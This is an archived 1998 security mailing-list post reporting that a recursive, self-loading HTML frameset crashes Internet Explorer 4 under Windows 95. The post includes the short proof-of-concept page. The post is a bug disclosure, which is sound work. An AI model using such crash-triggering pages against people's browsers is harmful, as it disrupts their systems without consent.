IE 4 Bug (Crash with frames)

From: Thomas Weidauer (weidauerat_private)
Date: Wed Mar 18 1998 - 05:44:53 PST

  • Next message: Pavel Kankovsky: "Re: Midnight Commander /tmp race"

    I fust found a way to crash IE 4 using frames:
    Make a file 'test.htm' with the following content
    and view it with IE 4. Under Win95 IE 4 will
    crash.
    
    <!--
    
    <HTML>
    <HEAD>
    <TITLE>IE 4 BUG</TITLE>
    </HEAD>
    
    <FRAMESET ROWS = 50%,50%>
            <FRAME SRC = "test.htm">
            <FRAME SRC = "test.htm">
    </FRAMESET>
    
    <BODY>
    
    </BODY>
    </HTML>
    
    -->
    
    
    Thomas Weidauer
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:46:09 PDT